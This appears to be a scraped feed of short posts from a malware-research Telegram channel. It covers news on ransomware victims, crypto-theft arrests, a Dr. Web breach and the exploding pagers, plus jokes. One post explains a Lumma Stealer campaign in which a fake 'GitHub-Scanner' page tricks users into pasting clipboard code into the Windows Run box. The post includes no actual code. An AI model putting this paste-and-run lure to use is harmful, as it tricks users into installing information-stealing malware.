14367
The largest collection of malware source, samples, and papers on the internet. Password: infected Website: https://www.vx-underground.org/ vx-underground Telegram chatroom link: https://t.me/+njfLzUrqos01ZWNh
Appreciation post time.
There are a lot of security researchers who have an entire career focused on tracking botnets, or information stealers, and do so for years with little to no recognition. We'd like to take a minute to shoutout a few people who we think are doing great stuff and not getting enough love and respect.
- malwrhunterteam, consistently for years tracking malware, initial access malware, and openly sharing information it
- Max_Mal_, Cryptolaemus1 (and whoever is part of the group), JAMESWT_MHT, and 1ZRR4H, for ruthlessly tracking many of the big names botnets and loaders and openly sharing information on it
- JaffaCakes118, and Neiki__, they both are some of the largest malware collectors and distributors. They've freely shared millions of malware samples for years.
- At-Gootloader, actively tracking Gootloader, the initial access malware used by many ransomware groups, and doing so, for free, for literally years.
- bmmaloney97, the number one expert in Windows One Drive analysis and internal. He has openly and freely shared his research for years.
- RussianPanda9xx, for actively tracking Lumma Stealer (and tons of others), for what feels like forever, and openly sharing information and updates on the malware.
There's so many more we could shoutout, but we can't think of anymore off the top of our our head. But your work is respected and remembered. Thank you so much for the things you do for the researchers and the world.
Following the arrest of Malone Iam, for his alleged theft of $243,000,000, the cryptodrainer community has shown support for Malone Iam by having videos produced requesting his freedom.
They got shirts made really fast.
ZachXBT continues to prove himself as a world leading expert in crypto analysis. It is remarkable how a single person can make such a profound impact.
He gave law enforcement everything they needed on a silver plate. He got them busted in less than 2 months.
tl;dr speedrun
Attached PDF is from Twitter. It is how he got 2 crypto thieves arrested for stealing $243,000,000.
RansomHub ransomware groups claims to have ransomed Liberty First Credit Union.
Liberty First Credit Union is a small to medium sized credit union (not-for-profit bank) located in Omaha, Nebraska.
Oh and pagers and walkie talkies exploding. This does not fall into the realm of malware, or news we would typically discuss, but there is a high volume of people who believe this to be malware.
It's not malware. They snuck explosives into the devices.
Have a nice day.
If you're curious what pain looks like:
https://samples.vx-underground.org/tmp/prankware.txt
Lockbit ransomware group claims to have ransomed eFile dot com.
eFile dot com IS NOT the IRS eFile system. eFile dot com is an IRS authorized entity approved for submitting financial documents to the IRS.
Update:
We found the guy who owns the MALWRE plate and he has received the sticker.
Oh. My. God.
The possibilities for initial access malware just went through the roof.
We've learned some of you don't have Xitter, or the ability to see the post, so here it is as a PDF so you don't have to do stuff.
Читать полностью…
We don't know much about pagers, or explosives.
But what we do know a little about is malware and we can promise you there is not some 1337 technique that magically transforms a regular battery into an incendiary device.
tl;dr modified pagers, science or something
"Everyone has to return to office. I only made $29,300,000 last year. How am I going to afford my new yacht on this salary?" — Andy Jassy, CEO of Amazon
Читать полностью…
Amazon announced starting in 2025 all workers will be expected to be back in the office.
Amazon employees jumped with joy knowing they will now have to wake up earlier, commute, waste time and money on travel, spend less time with their families, and deal with office politics!
It's corporate propaganda to say tech workers want to return to the office.
Читать полностью…
There is an interestingly psychological phenomena whereas some Threat Actors, particularly scammers and fraudsters, falsely believe having money will make them respectable or make people like them.
Money means nothing. Materialism does not impress people — only the shallow.
There is no information on the impact to customers. We don't believe clients money is gone — this isn't an attack against SWIFT. We presume this to be an attack against the institutions internal financial documents and employees.
However, we could also be completely wrong.
> OMG John Hammond's proof-of-concept trick is being used by Lumma stealer!!!
Us, with a giant library of malware source code and malware builders:
Crazy Thursday.
- Dr. Web, the Russian antivirus company, disclosed a breach. Dr. Web stopped sending antivirus updates September 16th. Subsequently, Dr. Web reportedly disconnected their servers from their internal network while they investigated the suspected compromise. Dr. Web reports to have resolved the issue and has returned to normal day-to-day operations. No Threat Actor has been attributed to the compromise. They believe the compromise occurred on or around September 14th.
- Yesterday, or sometime before, GitHub users were targeted in mass by a large scale phishing and/or malware campaign. An unknown Threat Actor(s) pushed their Lumma Stealer campaign by leaving bogus issues on GitHub projects. When the project owner visited the issue, the issue linked to a domain titled 'GitHub-Scanner'. GitHub-Scanner requested the visitor prove their humanity (e.g. not a robot) by doing Windows + R and CTRL + V + ENTER. When the site is visited, the website copies malicious code to the users clipboard. Windows + R, opening Windows Run, and CTRL + V, pasting the malicious code to the Run window and ENTER would run the code, this would trick the user into executing their malware payload. Once the payload is executed, it downloads a file called 'IE6.exe'. IE6.exe is Lumma information stealer. While it is a clever trick, the Threat Actor(s) (intentionally, or unintentionally) did not account for users who are not running Windows. This caused confusion for non-Windows users, or users on mobile devices.
> have prankware idea (non-malicious malware?)
> write simple poc
> it works.png
> decided to rewrite it 1337 coo w/ no dependencies
> ...
> 841 lines of c++ later
> nowhere near done
we're gone for 2 hours and now people are turning butt plugs into bombs wtf
Just kidding, that didn't happen. That'd be crazy though.
we're gone for 30 minutes and now people are turning walkie talkies into bombs wtf
Читать полностью…
Actually, maybe not. Microsoft has upped the ante. It's all over.
We didn't anticipate Microsoft actually caring 😭
We spotted someone in California with the license plate "MALWRE".
We left a sticker on your driver side window
tl;dr tl;dr this guy fuckin' nailed it and we believe him to be an expert figure on hardware hacking and big brain sciency magic stuff
https://x.com/_MG_/status/1836086734171574446
we're gone for half a day and now people are turning pagers into bombs wtf
Читать полностью…
wE oFfEr fReE cOFFee
Amazon employees are making six figures. Free coffee is 100% not a make-or-break situation. Half these nerds are probably burning money on Uber Eats because they don't even want to walk to the kitchen
In the United States this is an actual career path. The job title is "Influencer". If done correctly you can get as much as $100,000/video by the Kremlin
Читать полностью…
Best places to find information on obscure parts of Windows internals:
- UnknownCheats, random guy with anime profile picture reversed it, only got 2 upvotes
- Random old blog from the mid-2000's, author stopped posting 15 years ago.
- Chinese developer forums